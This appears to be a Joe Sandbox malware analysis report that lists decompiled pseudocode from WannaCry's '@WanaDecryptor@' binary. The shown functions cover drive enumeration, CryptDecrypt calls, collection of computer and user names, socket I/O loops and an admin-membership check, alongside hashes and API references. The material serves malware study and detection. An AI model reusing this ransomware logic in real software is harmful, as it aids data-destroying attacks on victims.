                                  0x0040a2c5
                                  0x0040a2c5
                                  0x0040a2cf
                                  0x0040a2d0
                                  0x0040a2d3
                                  0x00000000
                                  0x0040a2bb

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                  • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                  • Opcode Fuzzy Hash: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                  • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403A20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403A20(intOrPtr _a4, intOrPtr _a8) {
				union _ULARGE_INTEGER _v8;
				union _ULARGE_INTEGER _v16;
				intOrPtr _v20;
				union _ULARGE_INTEGER _v24;
				short _v28;
				short _v32;
				short _t23;
				short _t34;
				signed int _t47;
				unsigned int _t50;

				if( *((intOrPtr*)(_a8 + 8)) != 0) {
					return 1;
				} else {
					_t50 = GetLogicalDrives();
					_t47 = 2;
					do {
						if((_t50 >> _t47 & 0x00000001) != 0) {
							_t23 =  *L" : "; // 0x3a0020
							_t34 =  *0x420760; // 0x20
							_v32 = _t23;
							_t7 = _t47 + 0x41; // 0x43
							_v28 = _t34;
							_v32 = _t7;
							_v28 = 0x5c;
							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
								_v28 = 0;
								E004026B0(_a4,  &_v32);
							}
						}
						_t47 = _t47 + 1;
					} while (_t47 <= 0x19);
					return 1;
				}
			}













                                  0x00403a2c
                                  0x00403ae4
                                  0x00403a32
                                  0x00403a41
                                  0x00403a43
                                  0x00403a48
                                  0x00403a51
                                  0x00403a53
                                  0x00403a58
                                  0x00403a5e
                                  0x00403a66
                                  0x00403a69
                                  0x00403a6e
                                  0x00403a73
                                  0x00403a7f
                                  0x00403ab8
                                  0x00403abf
                                  0x00403abf
                                  0x00403a7f
                                  0x00403ac4
                                  0x00403ac5
                                  0x00403ad9
                                  0x00403ad9

                                  APIs
                                  • GetLogicalDrives.KERNEL32 ref: 00403A35
                                  • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                  • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                  • String ID: : $\
                                  • API String ID: 222820107-856521285
                                  • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                  • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D300 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
				void _v1024;
				char _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				void* _v1040;
				intOrPtr _v1044;
				char _v1048;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				void* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t49;
				signed int _t58;
				intOrPtr* _t60;
				signed int _t70;
				signed int _t71;
				signed int _t78;
				void* _t83;
				void* _t91;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void** _t107;
				void** _t109;

				_t106 =  &_v1040;
				_t105 = _a8;
				_t60 = __ecx;
				_v1032 = 0;
				if(_t105 != 0) {
					_t34 = E0040D5D0(__ecx);
					__eflags = _t34;
					if(_t34 != 0) {
						__eflags = _a12;
						if(_a12 == 0) {
							_t36 = _a4;
							_v1040 = _t36;
							_t91 = _t36;
							goto L13;
						} else {
							__eflags = _a16;
							if(_a16 != 0) {
								__eflags = _t105 - 0x400;
								if(_t105 > 0x400) {
									_t49 = E00412A90(_t105);
									_t109 =  &(( &_v1040)[1]);
									_v1040 = _t49;
									__eflags = _t49;
									if(_t49 != 0) {
										_t103 = _a4;
										_t70 = _t105;
										_t71 = _t70 >> 2;
										memcpy(_t49, _t103, _t71 << 2);
										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
										_t106 =  &(_t109[6]);
										_t91 = _v1040;
										E0040D2B0(_t60, _t91, _t105);
										goto L13;
									} else {
										return _t49;
									}
								} else {
									_t104 = _a4;
									_t78 = _t105 >> 2;
									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
									_t106 =  &(( &_v1040)[6]);
									_t83 =  &_v1024;
									_t91 = _t83;
									_v1040 = _t83;
									E0040D2B0(_t60, _t91, _t105);
									goto L13;
								}
							} else {
								_t91 = _a4;
								E0040D2B0(__ecx, _t91, _t105);
								L13:
								_push( &_v1028);
								L0041303E();
								_t37 = _v1028;
								_t107 =  &(_t106[1]);
								_t102 = 0;
								_v1036 = _t37;
								__eflags = _t105;
								if(_t105 > 0) {
									while(1) {
										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
											goto L25;
										}
										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
										__eflags = _t43;
										if(__eflags > 0) {
											_t102 = _t102 + _t43;
											__eflags = _t102;
											_push( &_v1048);
											goto L24;
										} else {
											if(__eflags != 0) {
												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
												__eflags = _t45 - 0x2733;
												if(_t45 == 0x2733) {
													_t46 = _v1044;
													__eflags = _t46 - 0x64;
													_v1044 = _t46 + 1;
													if(_t46 > 0x64) {
														Sleep(0x64);
														_v1044 = 0;
													}
													_push( &_v1048);
													L24:
													L0041303E();
													_t107 =  &(_t107[1]);
													__eflags = _t102 - _t105;
													if(_t102 < _t105) {
														_t37 = _v1048;
														continue;
													}
												}
											}
										}
										goto L25;
									}
								}
								L25:
								__eflags = _t91 - _a4;
								if(_t91 != _a4) {
									__eflags = _t91 -  &_v1024;
									if(_t91 !=  &_v1024) {
										__eflags = _t91;
										if(_t91 != 0) {
											free(_t91);
										}
									}
								}
								return _t102;
							}
						}
					} else {
						_t58 = _t34 | 0xffffffff;
						__eflags = _t58;
						return _t58;
					}
				} else {
					return 0;
				}
			}






























                                  0x0040d300
                                  0x0040d308
                                  0x0040d313
                                  0x0040d315
                                  0x0040d31d
                                  0x0040d330
                                  0x0040d335
                                  0x0040d337
                                  0x0040d350
                                  0x0040d352
                                  0x0040d3f6
                                  0x0040d3fd
                                  0x0040d401
                                  0x00000000
                                  0x0040d358
                                  0x0040d35f
                                  0x0040d361
                                  0x0040d378
                                  0x0040d37e
                                  0x0040d3b1
                                  0x0040d3b6
                                  0x0040d3b9
                                  0x0040d3bd
                                  0x0040d3bf
                                  0x0040d3ce
                                  0x0040d3d5
                                  0x0040d3db
                                  0x0040d3de
                                  0x0040d3e6
                                  0x0040d3e6
                                  0x0040d3e8
                                  0x0040d3ef
                                  0x00000000
                                  0x0040d3cb
                                  0x0040d3cb
                                  0x0040d3cb
                                  0x0040d380
                                  0x0040d380
                                  0x0040d38f
                                  0x0040d39a
                                  0x0040d39a
                                  0x0040d39c
                                  0x0040d3a0
                                  0x0040d3a2
                                  0x0040d3a9
                                  0x00000000
                                  0x0040d3a9
                                  0x0040d363
                                  0x0040d363
                                  0x0040d36e
                                  0x0040d403
                                  0x0040d407
                                  0x0040d408
                                  0x0040d40d
                                  0x0040d411
                                  0x0040d414
                                  0x0040d416
                                  0x0040d41a
                                  0x0040d41c
                                  0x0040d424
                                  0x0040d42d
                                  0x0040d42f
                                  0x00000000
                                  0x00000000
                                  0x0040d442
                                  0x0040d445
                                  0x0040d447
                                  0x0040d480
                                  0x0040d480
                                  0x0040d486
                                  0x00000000
                                  0x0040d449
                                  0x0040d449
                                  0x0040d44f
                                  0x0040d452
                                  0x0040d457
                                  0x0040d459
                                  0x0040d460
                                  0x0040d463
                                  0x0040d467
                                  0x0040d46b
                                  0x0040d471
                                  0x0040d471
                                  0x0040d47d
                                  0x0040d487
                                  0x0040d487
                                  0x0040d48c
                                  0x0040d48f
                                  0x0040d491
                                  0x0040d420
                                  0x00000000
                                  0x0040d420
                                  0x0040d491
                                  0x0040d457
                                  0x0040d449
                                  0x00000000
                                  0x0040d447
                                  0x0040d424
                                  0x0040d493
                                  0x0040d493
                                  0x0040d49a
                                  0x0040d4a0
                                  0x0040d4a2
                                  0x0040d4a4
                                  0x0040d4a6
                                  0x0040d4a9
                                  0x0040d4ae
                                  0x0040d4a6
                                  0x0040d4a2
                                  0x0040d4bd
                                  0x0040d4bd
                                  0x0040d361
                                  0x0040d33c
                                  0x0040d33c
                                  0x0040d33c
                                  0x0040d346
                                  0x0040d346
                                  0x0040d322
                                  0x0040d32b
                                  0x0040d32b

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c8f85ea80c3b6b8e9e311ac575965a537163168bbe12e9f95371609f99db3755
                                  • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                  • Opcode Fuzzy Hash: c8f85ea80c3b6b8e9e311ac575965a537163168bbe12e9f95371609f99db3755
                                  • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404AF0 Relevance: 6.1, APIs: 4, Instructions: 51encryptionCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00404AF0(void* __ecx, void* _a4, int _a8) {
				intOrPtr* _v4;
				void* _v8;
				signed int _v12;
				int _t12;
				void* _t19;
				signed int _t22;
				signed int _t23;
				struct _CRITICAL_SECTION* _t30;
				void* _t36;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					_t2 = _t19 + 0x10; // 0x14
					_t30 = _t2;
					EnterCriticalSection(_t30);
					_t36 = _a4;
					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
					_push(_t30);
					if(_t12 != 0) {
						LeaveCriticalSection();
						_t22 = _v12;
						_t23 = _t22 >> 2;
						memcpy(_v8, _t36, _t23 << 2);
						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
						return 1;
					} else {
						LeaveCriticalSection();
						return 0;
					}
				} else {
					return 0;
				}
			}












                                  0x00404af1
                                  0x00404afa
                                  0x00404b04
                                  0x00404b04
                                  0x00404b08
                                  0x00404b0e
                                  0x00404b22
                                  0x00404b2a
                                  0x00404b2b
                                  0x00404b3b
                                  0x00404b49
                                  0x00404b4d
                                  0x00404b50
                                  0x00404b60
                                  0x00404b67
                                  0x00404b2d
                                  0x00404b2d
                                  0x00404b38
                                  0x00404b38
                                  0x00404afe
                                  0x00404b01
                                  0x00404b01

                                  APIs
                                  • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                  • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$CryptDecryptEnterLeave
                                  • String ID:
                                  • API String ID: 1395129968-0
                                  • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                  • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BED0 Relevance: 4.6, APIs: 3, Instructions: 108COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E0040BED0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v0;
				char _v4;
				intOrPtr _v12;
				intOrPtr _v36;
				void _v311;
				char _v312;
				char _v332;
				char _v572;
				void _v611;
				char _v612;
				intOrPtr _v616;
				long _v620;
				char _v633;
				intOrPtr _t29;
				signed int _t30;
				signed int _t32;
				signed int _t50;
				char _t51;
				char _t54;
				signed int _t67;
				intOrPtr _t83;

				_t29 =  *[fs:0x0];
				_t50 =  *0x422210; // 0xb24228
				_push(0xffffffff);
				_push(E0041429E);
				_push(_t29);
				 *[fs:0x0] = _t83;
				if(_t50 != 0) {
					_t29 =  *((intOrPtr*)( *_t50 + 0xc))();
					_t67 =  *0x422210; // 0xb24228
					if(_t67 != 0) {
						_t29 =  *((intOrPtr*)( *_t67))(1);
					}
				}
				_push(0x2c);
				L00412CEC();
				_v616 = _t29;
				_v4 = 0;
				if(_t29 == 0) {
					_t30 = 0;
				} else {
					_t30 = E0040D5E0(_t29);
				}
				_v4 = 0xffffffff;
				 *0x422210 = _t30;
				if(_t30 != 0) {
					_push(_a4);
					_t32 = E0040BAF0();
					if(_t32 == 0) {
						_t51 =  *0x421798; // 0x0
						_v612 = _t51;
						memset( &_v611, 0, 0x4a << 2);
						asm("stosw");
						asm("stosb");
						_v620 = 0x12b;
						GetComputerNameA( &_v612,  &_v620);
						_t54 =  *0x421798; // 0x0
						_v312 = _t54;
						memset( &_v311, 0, 0x4a << 2);
						asm("stosw");
						asm("stosb");
						_v572 = 0;
						_v620 = 0x12b;
						GetUserNameA( &_v312,  &_v620);
						_push(8);
						_push(_a8);
						E0040DC00(_a16);
						E0040DD00(_a16,  &_v620);
						_push(1);
						_push( &_v633);
						_v633 = _v0;
						E0040DC00(_a16);
						E0040DD00(_a16,  &_v332);
						 *[fs:0x0] = _v36;
						return 0;
					} else {
						 *[fs:0x0] = _v12;
						return _t32 | 0xffffffff;
					}
				} else {
					 *[fs:0x0] = _v12;
					return _t30 | 0xffffffff;
				}
			}
























                                  0x0040bed0
                                  0x0040bed6
                                  0x0040bedc
                                  0x0040bede
                                  0x0040bee3
                                  0x0040bee4
                                  0x0040bef3
                                  0x0040bef7
                                  0x0040befa
                                  0x0040bf02
                                  0x0040bf08
                                  0x0040bf08
                                  0x0040bf02
                                  0x0040bf0a
                                  0x0040bf0c
                                  0x0040bf14
                                  0x0040bf1a
                                  0x0040bf25
                                  0x0040bf30
                                  0x0040bf27
                                  0x0040bf29
                                  0x0040bf29
                                  0x0040bf34
                                  0x0040bf3f
                                  0x0040bf44
                                  0x0040bf65
                                  0x0040bf66
                                  0x0040bf70
                                  0x0040bf8a
                                  0x0040bf92
                                  0x0040bfa5
                                  0x0040bfa7
                                  0x0040bfa9
                                  0x0040bfb5
                                  0x0040bfb9
                                  0x0040bfbf
                                  0x0040bfc7
                                  0x0040bfde
                                  0x0040bfe0
                                  0x0040bfe2
                                  0x0040bfec
                                  0x0040bff1
                                  0x0040bff5
                                  0x0040c009
                                  0x0040c00b
                                  0x0040c00e
                                  0x0040c01a
                                  0x0040c02a
                                  0x0040c02c
                                  0x0040c02f
                                  0x0040c033
                                  0x0040c042
                                  0x0040c052
                                  0x0040c05f
                                  0x0040bf72
                                  0x0040bf7c
                                  0x0040bf89
                                  0x0040bf89
                                  0x0040bf46
                                  0x0040bf50
                                  0x0040bf5d
                                  0x0040bf5d

                                  APIs
                                  • #823.MFC42(0000002C), ref: 0040BF0C
                                  • GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
                                  • GetUserNameA.ADVAPI32 ref: 0040BFF5
                                    • Part of subcall function 0040DC00: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040DC9E
                                    • Part of subcall function 0040DC00: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040DCAD
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Name$#823??0exception@@ComputerExceptionThrowUser
                                  • String ID:
                                  • API String ID: 2582426243-0
                                  • Opcode ID: dfb134e3e20c56f6c43c465dd7d0b2bdc90d3be31fa2d905cc250f6dcb77a9ab
                                  • Instruction ID: 83e3db62829b85d845063e2f81586b9f479c5ffe1e9c48acb6c19853c4e1520f
                                  • Opcode Fuzzy Hash: dfb134e3e20c56f6c43c465dd7d0b2bdc90d3be31fa2d905cc250f6dcb77a9ab
                                  • Instruction Fuzzy Hash: 8541C2706087829BD720DF64D854BAB7BE4EBC8710F004A3DF599933D0DB789508CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D4C0 Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0040D4C0() {
				void* __ecx;
				signed int _t17;
				intOrPtr _t19;
				signed int _t28;
				void* _t29;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				intOrPtr* _t34;
				signed int _t48;
				intOrPtr* _t50;
				signed int _t51;
				void* _t52;
				void* _t53;

				_t33 =  *(_t52 + 0x10);
				_t51 = 0;
				_t50 = _t34;
				if(_t33 != 0) {
					_t17 = E0040D5D0(_t50);
					__eflags = _t17;
					if(_t17 != 0) {
						_push(_t52 + 0xc);
						_t48 = 0;
						L0041303E();
						_t19 =  *((intOrPtr*)(_t52 + 0x14));
						_t53 = _t52 + 4;
						__eflags = _t33;
						 *((intOrPtr*)(_t53 + 0x1c)) = _t19;
						if(_t33 > 0) {
							while(1) {
								__eflags = _t19 -  *((intOrPtr*)(_t53 + 0x10)) -  *((intOrPtr*)(_t50 + 0x28));
								if(_t19 -  *((intOrPtr*)(_t53 + 0x10)) >  *((intOrPtr*)(_t50 + 0x28))) {
									goto L16;
								}
								_t28 =  *((intOrPtr*)( *_t50 + 0x24))( *((intOrPtr*)(_t50 + 4)), _t48 +  *((intOrPtr*)(_t53 + 0x18)), _t33 - _t48);
								__eflags = _t28;
								if(__eflags > 0) {
									_t48 = _t48 + _t28;
									__eflags = _t48;
									_push(_t53 + 0x1c);
									goto L15;
								} else {
									if(__eflags != 0) {
										_t29 =  *((intOrPtr*)( *_t50 + 0x28))();
										__eflags = _t29 - 0x2733;
										if(_t29 == 0x2733) {
											_t30 = _t51;
											_t51 = _t51 + 1;
											__eflags = _t30 - 0x64;
											if(_t30 > 0x64) {
												Sleep(0x64);
												_t51 = 0;
												__eflags = 0;
											}
											_push(_t53 + 0x1c);
											L15:
											L0041303E();
											_t53 = _t53 + 4;
											__eflags = _t48 - _t33;
											if(_t48 < _t33) {
												_t19 =  *((intOrPtr*)(_t53 + 0x1c));
												continue;
											}
										}
									}
								}
								goto L16;
							}
						}
						L16:
						__eflags =  *(_t53 + 0x20);
						if( *(_t53 + 0x20) != 0) {
							E0040D2B0(_t50,  *((intOrPtr*)(_t53 + 0x18)), _t48);
						}
						return _t48;
					} else {
						_t31 = _t17 | 0xffffffff;
						__eflags = _t31;
						return _t31;
					}
				} else {
					return 0;
				}
			}

















                                  0x0040d4c2
                                  0x0040d4c7
                                  0x0040d4ca
                                  0x0040d4ce
                                  0x0040d4db
                                  0x0040d4e0
                                  0x0040d4e2
                                  0x0040d4f3
                                  0x0040d4f4
                                  0x0040d4f6
                                  0x0040d4fb
                                  0x0040d4ff
                                  0x0040d502
                                  0x0040d504
                                  0x0040d508
                                  0x0040d510
                                  0x0040d519
                                  0x0040d51b
                                  0x00000000
                                  0x00000000
                                  0x0040d532
                                  0x0040d535
                                  0x0040d537
                                  0x0040d566
                                  0x0040d566
                                  0x0040d568
                                  0x00000000
                                  0x0040d539
                                  0x0040d539
                                  0x0040d53f
                                  0x0040d542
                                  0x0040d547
                                  0x0040d549
                                  0x0040d54b
                                  0x0040d54c
                                  0x0040d54f
                                  0x0040d553
                                  0x0040d559
                                  0x0040d559
                                  0x0040d559
                                  0x0040d55f
                                  0x0040d569
                                  0x0040d569
                                  0x0040d56e
                                  0x0040d571
                                  0x0040d573
                                  0x0040d50c
                                  0x00000000
                                  0x0040d50c
                                  0x0040d573
                                  0x0040d547
                                  0x0040d539
                                  0x00000000
                                  0x0040d537
                                  0x0040d510
                                  0x0040d575
                                  0x0040d579
                                  0x0040d57b
                                  0x0040d585
                                  0x0040d585
                                  0x0040d591
                                  0x0040d4e6
                                  0x0040d4e6
                                  0x0040d4e6
                                  0x0040d4eb
                                  0x0040d4eb
                                  0x0040d4d2
                                  0x0040d4d6
                                  0x0040d4d6

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e68fbcf5b22235d79db144bb8702833b1e0f7456deab8b0abe335e8fb721804
                                  • Instruction ID: 4ffb44c4908fbcdbada2a4de5981d2af022f8853c63cab2f762cb5961de049d3
                                  • Opcode Fuzzy Hash: 5e68fbcf5b22235d79db144bb8702833b1e0f7456deab8b0abe335e8fb721804
                                  • Instruction Fuzzy Hash: B121B172B042016FC314DF99AC84C6BB399EBD8358B104A3FF946D7381DA35DC09879A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401BB0 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00401BB0() {
				char _v3;
				char _v4;
				char _v5;
				char _v6;
				char _v7;
				struct _SID_IDENTIFIER_AUTHORITY _v8;
				void* _v12;
				char _v16;
				void* _v24;
				long _v28;
				int _t16;
				void* _t17;

				_v8.Value = 0;
				_v7 = 0;
				_v6 = 0;
				_v5 = 0;
				_v4 = 0;
				_v3 = 5;
				_v16 = 0;
				_t16 = AllocateAndInitializeSid( &_v8, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t16 != 0) {
					_t17 = _v12;
					__imp__CheckTokenMembership(0, _t17,  &_v16);
					if(_t17 == 0) {
						_v28 = 0;
					}
					FreeSid(_v24);
					return _v28;
				} else {
					return _t16;
				}
			}















                                  0x00401bcf
                                  0x00401bd3
                                  0x00401bd7
                                  0x00401bdb
                                  0x00401bdf
                                  0x00401be3
                                  0x00401be8
                                  0x00401bec
                                  0x00401bf4
                                  0x00401bfb
                                  0x00401c06
                                  0x00401c0e
                                  0x00401c10
                                  0x00401c10
                                  0x00401c19
                                  0x00401c27
                                  0x00401bfa
                                  0x00401bfa
                                  0x00401bfa

                                  APIs
                                  • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEC
                                  • CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 00401C06
                                  • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401C19
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
